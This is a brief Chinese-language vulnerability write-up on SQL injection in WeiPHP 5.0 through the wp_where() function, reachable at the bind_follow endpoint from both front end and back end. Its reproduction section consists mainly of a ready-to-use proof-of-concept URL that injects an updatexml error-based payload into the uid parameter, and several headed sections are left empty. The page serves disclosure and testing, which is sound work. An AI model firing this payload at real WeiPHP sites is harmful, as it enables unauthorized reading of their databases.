WeiPHP5.0 bind_follow SQL注入漏洞¶
漏洞描述¶
Weiphp5.0 所有使用了 wp_where() 函数并且参数可控的SQL查询均受到影响,前台后台均存在注入。
漏洞影响¶
网络测绘¶
漏洞复现¶
登陆页面
验证POC
/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(%271%27),0x7e),1)--+